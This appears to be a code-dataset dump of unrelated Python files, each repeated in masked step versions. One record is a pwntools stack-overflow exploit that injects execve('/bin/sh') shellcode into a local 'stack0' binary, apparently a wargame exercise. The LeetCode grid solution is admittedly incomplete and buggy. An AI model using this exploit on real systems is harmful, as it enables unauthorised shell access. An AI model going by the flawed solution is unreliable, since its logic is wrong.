"step-5": "#!/usr/bin/python3\n\n\"\"\"\n @author : Chris Phibbs\n @created : Sunday Aug 30, 2020 14:05:56 AEST\n @file : q3\n\n\"\"\"\n\nclass Solution:\n def minDays(self, grid: List[List[int]]) -> int:\n # bfs - find 1, run bfs. Then loop through - if any other ones found then disconnected\n \n i, j = 0, 0\n islandExists = False\n visited = dict()\n leastAdjacent = 4\n \n while i < len(grid):\n while j < len(grid[i]):\n if grid[i][j] == 1 and (i,j) not in visited:\n # new land - return 0 if already disconnected from already found land\n if islandExists == True: return 0\n \n islandExists = True\n # run bfs\n \n s = list()\n s.append((i,j))\n\n \n while s:\n n = 0\n x, y = s.pop()\n print(f\"current coords are {x}, {y}\")\n visited[(x,y)] = True\n \n if self.checkLand(grid, x-1, y): n+=1\n if self.checkLand(grid, x+1, y): n+=1\n if self.checkLand(grid, x, y-1): n+=1\n if self.checkLand(grid, x, y+1): n+=1\n \n leastAdjacent = min(leastAdjacent, n)\n \n if self.checkValid(grid, visited, x-1, y): s.append((x-1, y))\n if self.checkValid(grid, visited, x+1, y): s.append((x+1, y)) \n if self.checkValid(grid, visited, x, y-1): s.append((x, y-1))\n if self.checkValid(grid, visited, x, y+1): s.append((x, y+1))\n \n # Did not handle the \"bridge\" case - i.e. element of n == 2 that when removed disconnects everything\n # TL;DR If not in the corner and n==2 then answer is 1\n \n \n \n \n j += 1\n i += 1\n \n if len(grid[0]) == 2: return 2\n \n return leastAdjacent\n \n # if land and not visited, run bfs\n # else do nothing\n \n \n # returns True if valid land\n def checkValid(self, grid, visited, x, y):\n if x < 0 or x >= len(grid): return False\n if y < 0 or y >= len(grid[0]): return False\n if (x,y) in visited: return False\n return grid[x][y] == 1 \n \n def checkLand(self, grid, x, y):\n print(f\"current checkLand(x,y) are {x}, {y}\")\n if x < 0 or x >= len(grid): return False\n if y < 0 or y >= len(grid[0]): return False\n return grid[x][y] == 1\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#inject shellcode
from pwn import *
shellcode =p32(0x8049000+0x4)\
+asm("mov eax,SYS_execve")\
+asm("xor ecx,ecx")\
+asm("xor edx,edx")\
+asm("mov ebx,0x8049014")\
+asm("int 0x80")\
+"/bin/sh"
r=process("./stack0",aslr=True)
r.sendline('A'*(0x4c)+p32(0x8049000-0x4)+p32(0x804840c)+p32(0x8049000))
r.sendline(shellcode)
r.interactive()
|
normal
|
{
"blob_id": "cf70d6064fd4a43bc17cd852aaf04afade73d995",
"index": 9252,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nr.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))\nr.sendline(shellcode)\nr.interactive()\n",
"step-3": "<mask token>\nshellcode = p32(134516736 + 4) + asm('mov eax,SYS_execve') + asm('xor ecx,ecx'\n ) + asm('xor edx,edx') + asm('mov ebx,0x8049014') + asm('int 0x80'\n ) + '/bin/sh'\nr = process('./stack0', aslr=True)\nr.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))\nr.sendline(shellcode)\nr.interactive()\n",
"step-4": "from pwn import *\nshellcode = p32(134516736 + 4) + asm('mov eax,SYS_execve') + asm('xor ecx,ecx'\n ) + asm('xor edx,edx') + asm('mov ebx,0x8049014') + asm('int 0x80'\n ) + '/bin/sh'\nr = process('./stack0', aslr=True)\nr.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))\nr.sendline(shellcode)\nr.interactive()\n",
"step-5": "#inject shellcode\nfrom pwn import *\n\n\nshellcode =p32(0x8049000+0x4)\\\n+asm(\"mov eax,SYS_execve\")\\\n+asm(\"xor ecx,ecx\")\\\n+asm(\"xor edx,edx\")\\\n+asm(\"mov ebx,0x8049014\")\\\n+asm(\"int 0x80\")\\\n+\"/bin/sh\"\nr=process(\"./stack0\",aslr=True)\nr.sendline('A'*(0x4c)+p32(0x8049000-0x4)+p32(0x804840c)+p32(0x8049000))\nr.sendline(shellcode)\nr.interactive()\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from Psql_Database_Setup import *
import requests, json
engine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
response = requests.get("https://api.github.com/emojis")
response = json.loads(response.text)
for key,value in response.items():
Emoji = Emojis(name=key, url = value)
session.add(Emoji)
session.commit()
|
normal
|
{
"blob_id": "0aa95b6a72472e8e260c07f4c42a327384ca0da4",
"index": 9173,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor key, value in response.items():\n Emoji = Emojis(name=key, url=value)\n session.add(Emoji)\n session.commit()\n",
"step-3": "<mask token>\nengine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nresponse = requests.get('https://api.github.com/emojis')\nresponse = json.loads(response.text)\nfor key, value in response.items():\n Emoji = Emojis(name=key, url=value)\n session.add(Emoji)\n session.commit()\n",
"step-4": "from Psql_Database_Setup import *\nimport requests, json\nengine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nresponse = requests.get('https://api.github.com/emojis')\nresponse = json.loads(response.text)\nfor key, value in response.items():\n Emoji = Emojis(name=key, url=value)\n session.add(Emoji)\n session.commit()\n",
"step-5": "from Psql_Database_Setup import *\r\nimport requests, json\r\n\r\nengine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')\r\nBase.metadata.bind = engine\r\n\r\nDBSession = sessionmaker(bind=engine)\r\nsession = DBSession()\r\n\r\nresponse = requests.get(\"https://api.github.com/emojis\")\r\nresponse = json.loads(response.text)\r\n\r\nfor key,value in response.items():\r\n Emoji = Emojis(name=key, url = value)\r\n session.add(Emoji)\r\n session.commit()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))
print('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))
print('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))
print('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))
<|reserved_special_token_1|>
wage = 5
print('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))
print('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))
print('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))
print('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))
<|reserved_special_token_1|>
wage=5
print("%d시간에 %d%s 벌었습니다." %(1, wage*1, "달러"))
print("%d시간에 %d%s 벌었습니다." %(5, wage*5, "달러"))
print("%d시간에 %.1f%s 벌었습니다" %(1,5710.8,"원"))
print("%d시간에 %.1f%s 벌었습니다" %(5, 28554.0, "원"))
|
flexible
|
{
"blob_id": "2092ead8b8f268a22711b8af8052241c1ac00c15",
"index": 14,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))\nprint('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))\nprint('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))\nprint('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))\n",
"step-3": "wage = 5\nprint('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))\nprint('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))\nprint('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))\nprint('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))\n",
"step-4": "\nwage=5\n\nprint(\"%d시간에 %d%s 벌었습니다.\" %(1, wage*1, \"달러\"))\nprint(\"%d시간에 %d%s 벌었습니다.\" %(5, wage*5, \"달러\"))\n\nprint(\"%d시간에 %.1f%s 벌었습니다\" %(1,5710.8,\"원\"))\nprint(\"%d시간에 %.1f%s 벌었습니다\" %(5, 28554.0, \"원\"))\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class CheckoutConfig(AppConfig):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CheckoutConfig(AppConfig):
<|reserved_special_token_0|>
def ready(self):
import checkout.signals
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CheckoutConfig(AppConfig):
name = 'checkout'
def ready(self):
import checkout.signals
<|reserved_special_token_1|>
from django.apps import AppConfig
class CheckoutConfig(AppConfig):
name = 'checkout'
def ready(self):
import checkout.signals
<|reserved_special_token_1|>
from django.apps import AppConfig
class CheckoutConfig(AppConfig):
name = "checkout"
# Override the ready method and import the signals module
# so that update_on_save and update_on_delete will be called
# after an OrderLineItem model instance is saved or deleted
def ready(self):
import checkout.signals
|
flexible
|
{
"blob_id": "74e3f4cd7b09d9b96feb3f927a509b113481eaed",
"index": 7575,
"step-1": "<mask token>\n\n\nclass CheckoutConfig(AppConfig):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CheckoutConfig(AppConfig):\n <mask token>\n\n def ready(self):\n import checkout.signals\n",
"step-3": "<mask token>\n\n\nclass CheckoutConfig(AppConfig):\n name = 'checkout'\n\n def ready(self):\n import checkout.signals\n",
"step-4": "from django.apps import AppConfig\n\n\nclass CheckoutConfig(AppConfig):\n name = 'checkout'\n\n def ready(self):\n import checkout.signals\n",
"step-5": "from django.apps import AppConfig\n\n\nclass CheckoutConfig(AppConfig):\n name = \"checkout\"\n\n # Override the ready method and import the signals module\n # so that update_on_save and update_on_delete will be called\n # after an OrderLineItem model instance is saved or deleted\n def ready(self):\n import checkout.signals\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from day6input import *
groups = input.split('\n\n')
count = 0 #1
groupanswers = [] #2
for group in groups:
allananswers = set(list('abcdefghijklmnopqrstuvwxyz')) #2
answers = set() #1
people = group.split('\n')
for person in people:
allananswers = allananswers & set(list(person)) #2
#1
for answer in person:
if answer not in answers:
answers.add(answer)
count = count + 1
groupanswers.append(allananswers) #2
print(count) #1
#####2
answer2 = 0
for group in groupanswers:
answer2 = answer2 + len(group)
print(answer2)
|
normal
|
{
"blob_id": "8f1ec65ca60605747f46f596e0b5848922bcd0b5",
"index": 2127,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor group in groups:\n allananswers = set(list('abcdefghijklmnopqrstuvwxyz'))\n answers = set()\n people = group.split('\\n')\n for person in people:\n allananswers = allananswers & set(list(person))\n for answer in person:\n if answer not in answers:\n answers.add(answer)\n count = count + 1\n groupanswers.append(allananswers)\nprint(count)\n<mask token>\nfor group in groupanswers:\n answer2 = answer2 + len(group)\nprint(answer2)\n",
"step-3": "<mask token>\ngroups = input.split('\\n\\n')\ncount = 0\ngroupanswers = []\nfor group in groups:\n allananswers = set(list('abcdefghijklmnopqrstuvwxyz'))\n answers = set()\n people = group.split('\\n')\n for person in people:\n allananswers = allananswers & set(list(person))\n for answer in person:\n if answer not in answers:\n answers.add(answer)\n count = count + 1\n groupanswers.append(allananswers)\nprint(count)\nanswer2 = 0\nfor group in groupanswers:\n answer2 = answer2 + len(group)\nprint(answer2)\n",
"step-4": "from day6input import *\ngroups = input.split('\\n\\n')\ncount = 0\ngroupanswers = []\nfor group in groups:\n allananswers = set(list('abcdefghijklmnopqrstuvwxyz'))\n answers = set()\n people = group.split('\\n')\n for person in people:\n allananswers = allananswers & set(list(person))\n for answer in person:\n if answer not in answers:\n answers.add(answer)\n count = count + 1\n groupanswers.append(allananswers)\nprint(count)\nanswer2 = 0\nfor group in groupanswers:\n answer2 = answer2 + len(group)\nprint(answer2)\n",
"step-5": "from day6input import *\n\ngroups = input.split('\\n\\n')\n\ncount = 0 #1\ngroupanswers = [] #2\n\nfor group in groups:\n\n allananswers = set(list('abcdefghijklmnopqrstuvwxyz')) #2\n answers = set() #1\n\n people = group.split('\\n')\n for person in people:\n\n allananswers = allananswers & set(list(person)) #2\n\n #1\n for answer in person:\n if answer not in answers:\n answers.add(answer)\n count = count + 1\n\n groupanswers.append(allananswers) #2\n\nprint(count) #1\n\n#####2\nanswer2 = 0\nfor group in groupanswers:\n answer2 = answer2 + len(group)\nprint(answer2)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def build_response(session_attributes, speechlet_response):
return {'version': '1.0', 'sessionAttributes': session_attributes,
'response': speechlet_response}
def get_welcome_response():
""" If we wanted to initialize the session to have some attributes we could
add those here
"""
session_attributes = {}
card_title = 'Welcome to PB Parcel Tracker'
speech_output = 'Please give first 10 digits of tracking number'
reprompt_text = 'Please give first 10 digits of tracking number'
should_end_session = False
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = 'Session Ended'
speech_output = (
'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')
should_end_session = True
return build_response({}, build_speechlet_response(card_title,
speech_output, None, should_end_session))
<|reserved_special_token_0|>
def on_session_started(session_started_request, session):
""" Called when the session starts """
print('on_session_started requestId=' + session_started_request[
'requestId'] + ', sessionId=' + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print('on_launch requestId=' + launch_request['requestId'] +
', sessionId=' + session['sessionId'])
return get_welcome_response()
def oauth_request(session):
access_key = os.environ['key']
access_key_value = 'Basic ' + access_key
url = 'https://api-sandbox.pitneybowes.com/oauth/token'
r = requests.post(url, headers={'Authorization': access_key_value,
'Content-Type': 'application/x-www-form-urlencoded'}, data={
'grant_type': 'client_credentials'})
print(r.status_code)
if r.status_code == 200:
j = json.loads(r.content)
print(j)
session['access_token'] = j['access_token']
def on_intent(intent_request, session):
""" Called when the user specifies an intent for this skill """
print('on_intent requestId=' + intent_request['requestId'] +
', sessionId=' + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
if 'access_token' not in session:
oauth_request(session)
print(session['access_token'])
if intent_name == 'Tracking':
return setFirstEleven(intent, session)
elif intent_name == 'TrackingSecond':
return getParcelStatus(intent, session)
elif intent_name == 'AMAZON.HelpIntent':
return get_welcome_response()
elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':
return handle_session_end_request()
else:
raise ValueError('Invalid intent')
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print('on_session_ended requestId=' + session_ended_request['requestId'
] + ', sessionId=' + session['sessionId'])
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print('event.session.application.applicationId=' + event['session'][
'application']['applicationId'])
"""
Uncomment this if statement and populate with your skill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == 'LaunchRequest':
return on_launch(event['request'], event['session'])
elif event['request']['type'] == 'IntentRequest':
return on_intent(event['request'], event['session'])
elif event['request']['type'] == 'SessionEndedRequest':
return on_session_ended(event['request'], event['session'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def build_response(session_attributes, speechlet_response):
return {'version': '1.0', 'sessionAttributes': session_attributes,
'response': speechlet_response}
def get_welcome_response():
""" If we wanted to initialize the session to have some attributes we could
add those here
"""
session_attributes = {}
card_title = 'Welcome to PB Parcel Tracker'
speech_output = 'Please give first 10 digits of tracking number'
reprompt_text = 'Please give first 10 digits of tracking number'
should_end_session = False
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = 'Session Ended'
speech_output = (
'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')
should_end_session = True
return build_response({}, build_speechlet_response(card_title,
speech_output, None, should_end_session))
<|reserved_special_token_0|>
def getParcelStatus(intent, session):
session_attributes = {}
should_end_session = True
speech_output = 'There was some problem in taking your input'
reprompt_text = 'Please say remaining digits of the tracking number'
try:
tracking_number_11 = intent['slots']['Eleven']['value']
tracking_number_12 = intent['slots']['Twelve']['value']
tracking_number_13 = intent['slots']['Thirteen']['value']
tracking_number_14 = intent['slots']['Fourteen']['value']
tracking_number_15 = intent['slots']['Fifteen']['value']
tracking_number_16 = intent['slots']['Sixteen']['value']
tracking_number_17 = intent['slots']['Seventeen']['value']
tracking_number_18 = intent['slots']['Eighteen']['value']
tracking_number_19 = intent['slots']['Nineteen']['value']
tracking_number_20 = intent['slots']['Twenty']['value']
tracking_number_21 = intent['slots']['TwentyOne']['value']
tracking_number_22 = intent['slots']['TwentyTwo']['value']
tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,
tracking_number_12, tracking_number_13, tracking_number_14,
tracking_number_15, tracking_number_16, tracking_number_17,
tracking_number_18, tracking_number_19, tracking_number_20,
tracking_number_21, tracking_number_22)
print("'first_ten' not in session['attributes']--->")
print('first_ten' not in session['attributes'])
full_tracking_number = '%s%s' % (session['attributes']['first_ten'],
tracking_number)
bearer = 'Bearer %s' % session['access_token']
print('USPS FULL Tracking Number ----> %s' % full_tracking_number)
url = (
'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'
% full_tracking_number)
r = requests.get(url, headers={'Authorization': bearer})
tracking_response = {}
tracking_response = json.loads(r.content)
if r.status_code == 200:
speech_output = 'The status of the parcel is ' + tracking_response[
'status']
reprompt_text = 'The status of the parcel is ' + tracking_response[
'status']
else:
speech_output = tracking_response['errors'][0]['errorDescription']
reprompt_text = tracking_response['errors'][0]['errorDescription']
print(r.content)
except Exception as app_exception:
traceback.print_tb
should_end_session = False
if ('attributes' not in session or 'attributes' in session and
'first_ten' not in session['attributes']):
speech_output = (
'Please provide only first ten digits of the tracking number')
reprompt_text = (
'Please provide only first ten digits of the tracking number')
else:
speech_output = (
'There was some problem, Please say remaining digits of the tracking number'
)
reprompt_text = (
'Please say remaining digits of the tracking number')
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
def on_session_started(session_started_request, session):
""" Called when the session starts """
print('on_session_started requestId=' + session_started_request[
'requestId'] + ', sessionId=' + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print('on_launch requestId=' + launch_request['requestId'] +
', sessionId=' + session['sessionId'])
return get_welcome_response()
def oauth_request(session):
access_key = os.environ['key']
access_key_value = 'Basic ' + access_key
url = 'https://api-sandbox.pitneybowes.com/oauth/token'
r = requests.post(url, headers={'Authorization': access_key_value,
'Content-Type': 'application/x-www-form-urlencoded'}, data={
'grant_type': 'client_credentials'})
print(r.status_code)
if r.status_code == 200:
j = json.loads(r.content)
print(j)
session['access_token'] = j['access_token']
def on_intent(intent_request, session):
""" Called when the user specifies an intent for this skill """
print('on_intent requestId=' + intent_request['requestId'] +
', sessionId=' + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
if 'access_token' not in session:
oauth_request(session)
print(session['access_token'])
if intent_name == 'Tracking':
return setFirstEleven(intent, session)
elif intent_name == 'TrackingSecond':
return getParcelStatus(intent, session)
elif intent_name == 'AMAZON.HelpIntent':
return get_welcome_response()
elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':
return handle_session_end_request()
else:
raise ValueError('Invalid intent')
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print('on_session_ended requestId=' + session_ended_request['requestId'
] + ', sessionId=' + session['sessionId'])
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print('event.session.application.applicationId=' + event['session'][
'application']['applicationId'])
"""
Uncomment this if statement and populate with your skill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == 'LaunchRequest':
return on_launch(event['request'], event['session'])
elif event['request']['type'] == 'IntentRequest':
return on_intent(event['request'], event['session'])
elif event['request']['type'] == 'SessionEndedRequest':
return on_session_ended(event['request'], event['session'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def build_speechlet_response(title, output, reprompt_text, should_end_session):
return {'outputSpeech': {'type': 'PlainText', 'text': output}, 'card':
{'type': 'Simple', 'title': 'SessionSpeechlet - ' + title,
'content': 'SessionSpeechlet - ' + output}, 'reprompt': {
'outputSpeech': {'type': 'PlainText', 'text': reprompt_text}},
'shouldEndSession': should_end_session}
def build_response(session_attributes, speechlet_response):
return {'version': '1.0', 'sessionAttributes': session_attributes,
'response': speechlet_response}
def get_welcome_response():
""" If we wanted to initialize the session to have some attributes we could
add those here
"""
session_attributes = {}
card_title = 'Welcome to PB Parcel Tracker'
speech_output = 'Please give first 10 digits of tracking number'
reprompt_text = 'Please give first 10 digits of tracking number'
should_end_session = False
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = 'Session Ended'
speech_output = (
'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')
should_end_session = True
return build_response({}, build_speechlet_response(card_title,
speech_output, None, should_end_session))
def setFirstEleven(intent, session):
session_attributes = {}
should_end_session = False
speech_output = 'Now give remaining digits'
reprompt_text = 'Now give the next eleven numbers'
try:
tracking_number_1 = intent['slots']['One']['value']
tracking_number_2 = intent['slots']['Two']['value']
tracking_number_3 = intent['slots']['Three']['value']
tracking_number_4 = intent['slots']['Four']['value']
tracking_number_5 = intent['slots']['Five']['value']
tracking_number_6 = intent['slots']['Six']['value']
tracking_number_7 = intent['slots']['Seven']['value']
tracking_number_8 = intent['slots']['Eight']['value']
tracking_number_9 = intent['slots']['Nine']['value']
tracking_number_10 = intent['slots']['Ten']['value']
first_ten = '%s%s%s%s%s%s%s%s%s%s' % (tracking_number_1,
tracking_number_2, tracking_number_3, tracking_number_4,
tracking_number_5, tracking_number_6, tracking_number_7,
tracking_number_8, tracking_number_9, tracking_number_10)
session_attributes['first_ten'] = first_ten
print('session after adding first ten--->')
print(session_attributes)
except Exception as app_exception:
traceback.print_tb
speech_output = (
'There was some problem, Please provide first ten digits of the tracking number'
)
reprompt_text = 'Please say first ten digits of the tracking number'
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
def getParcelStatus(intent, session):
session_attributes = {}
should_end_session = True
speech_output = 'There was some problem in taking your input'
reprompt_text = 'Please say remaining digits of the tracking number'
try:
tracking_number_11 = intent['slots']['Eleven']['value']
tracking_number_12 = intent['slots']['Twelve']['value']
tracking_number_13 = intent['slots']['Thirteen']['value']
tracking_number_14 = intent['slots']['Fourteen']['value']
tracking_number_15 = intent['slots']['Fifteen']['value']
tracking_number_16 = intent['slots']['Sixteen']['value']
tracking_number_17 = intent['slots']['Seventeen']['value']
tracking_number_18 = intent['slots']['Eighteen']['value']
tracking_number_19 = intent['slots']['Nineteen']['value']
tracking_number_20 = intent['slots']['Twenty']['value']
tracking_number_21 = intent['slots']['TwentyOne']['value']
tracking_number_22 = intent['slots']['TwentyTwo']['value']
tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,
tracking_number_12, tracking_number_13, tracking_number_14,
tracking_number_15, tracking_number_16, tracking_number_17,
tracking_number_18, tracking_number_19, tracking_number_20,
tracking_number_21, tracking_number_22)
print("'first_ten' not in session['attributes']--->")
print('first_ten' not in session['attributes'])
full_tracking_number = '%s%s' % (session['attributes']['first_ten'],
tracking_number)
bearer = 'Bearer %s' % session['access_token']
print('USPS FULL Tracking Number ----> %s' % full_tracking_number)
url = (
'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'
% full_tracking_number)
r = requests.get(url, headers={'Authorization': bearer})
tracking_response = {}
tracking_response = json.loads(r.content)
if r.status_code == 200:
speech_output = 'The status of the parcel is ' + tracking_response[
'status']
reprompt_text = 'The status of the parcel is ' + tracking_response[
'status']
else:
speech_output = tracking_response['errors'][0]['errorDescription']
reprompt_text = tracking_response['errors'][0]['errorDescription']
print(r.content)
except Exception as app_exception:
traceback.print_tb
should_end_session = False
if ('attributes' not in session or 'attributes' in session and
'first_ten' not in session['attributes']):
speech_output = (
'Please provide only first ten digits of the tracking number')
reprompt_text = (
'Please provide only first ten digits of the tracking number')
else:
speech_output = (
'There was some problem, Please say remaining digits of the tracking number'
)
reprompt_text = (
'Please say remaining digits of the tracking number')
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
def on_session_started(session_started_request, session):
""" Called when the session starts """
print('on_session_started requestId=' + session_started_request[
'requestId'] + ', sessionId=' + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print('on_launch requestId=' + launch_request['requestId'] +
', sessionId=' + session['sessionId'])
return get_welcome_response()
def oauth_request(session):
access_key = os.environ['key']
access_key_value = 'Basic ' + access_key
url = 'https://api-sandbox.pitneybowes.com/oauth/token'
r = requests.post(url, headers={'Authorization': access_key_value,
'Content-Type': 'application/x-www-form-urlencoded'}, data={
'grant_type': 'client_credentials'})
print(r.status_code)
if r.status_code == 200:
j = json.loads(r.content)
print(j)
session['access_token'] = j['access_token']
def on_intent(intent_request, session):
""" Called when the user specifies an intent for this skill """
print('on_intent requestId=' + intent_request['requestId'] +
', sessionId=' + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
if 'access_token' not in session:
oauth_request(session)
print(session['access_token'])
if intent_name == 'Tracking':
return setFirstEleven(intent, session)
elif intent_name == 'TrackingSecond':
return getParcelStatus(intent, session)
elif intent_name == 'AMAZON.HelpIntent':
return get_welcome_response()
elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':
return handle_session_end_request()
else:
raise ValueError('Invalid intent')
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print('on_session_ended requestId=' + session_ended_request['requestId'
] + ', sessionId=' + session['sessionId'])
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print('event.session.application.applicationId=' + event['session'][
'application']['applicationId'])
"""
Uncomment this if statement and populate with your skill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == 'LaunchRequest':
return on_launch(event['request'], event['session'])
elif event['request']['type'] == 'IntentRequest':
return on_intent(event['request'], event['session'])
elif event['request']['type'] == 'SessionEndedRequest':
return on_session_ended(event['request'], event['session'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from __future__ import print_function
import traceback
import requests
import os
import json
def build_speechlet_response(title, output, reprompt_text, should_end_session):
return {'outputSpeech': {'type': 'PlainText', 'text': output}, 'card':
{'type': 'Simple', 'title': 'SessionSpeechlet - ' + title,
'content': 'SessionSpeechlet - ' + output}, 'reprompt': {
'outputSpeech': {'type': 'PlainText', 'text': reprompt_text}},
'shouldEndSession': should_end_session}
def build_response(session_attributes, speechlet_response):
return {'version': '1.0', 'sessionAttributes': session_attributes,
'response': speechlet_response}
def get_welcome_response():
""" If we wanted to initialize the session to have some attributes we could
add those here
"""
session_attributes = {}
card_title = 'Welcome to PB Parcel Tracker'
speech_output = 'Please give first 10 digits of tracking number'
reprompt_text = 'Please give first 10 digits of tracking number'
should_end_session = False
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = 'Session Ended'
speech_output = (
'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')
should_end_session = True
return build_response({}, build_speechlet_response(card_title,
speech_output, None, should_end_session))
def setFirstEleven(intent, session):
session_attributes = {}
should_end_session = False
speech_output = 'Now give remaining digits'
reprompt_text = 'Now give the next eleven numbers'
try:
tracking_number_1 = intent['slots']['One']['value']
tracking_number_2 = intent['slots']['Two']['value']
tracking_number_3 = intent['slots']['Three']['value']
tracking_number_4 = intent['slots']['Four']['value']
tracking_number_5 = intent['slots']['Five']['value']
tracking_number_6 = intent['slots']['Six']['value']
tracking_number_7 = intent['slots']['Seven']['value']
tracking_number_8 = intent['slots']['Eight']['value']
tracking_number_9 = intent['slots']['Nine']['value']
tracking_number_10 = intent['slots']['Ten']['value']
first_ten = '%s%s%s%s%s%s%s%s%s%s' % (tracking_number_1,
tracking_number_2, tracking_number_3, tracking_number_4,
tracking_number_5, tracking_number_6, tracking_number_7,
tracking_number_8, tracking_number_9, tracking_number_10)
session_attributes['first_ten'] = first_ten
print('session after adding first ten--->')
print(session_attributes)
except Exception as app_exception:
traceback.print_tb
speech_output = (
'There was some problem, Please provide first ten digits of the tracking number'
)
reprompt_text = 'Please say first ten digits of the tracking number'
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
def getParcelStatus(intent, session):
session_attributes = {}
should_end_session = True
speech_output = 'There was some problem in taking your input'
reprompt_text = 'Please say remaining digits of the tracking number'
try:
tracking_number_11 = intent['slots']['Eleven']['value']
tracking_number_12 = intent['slots']['Twelve']['value']
tracking_number_13 = intent['slots']['Thirteen']['value']
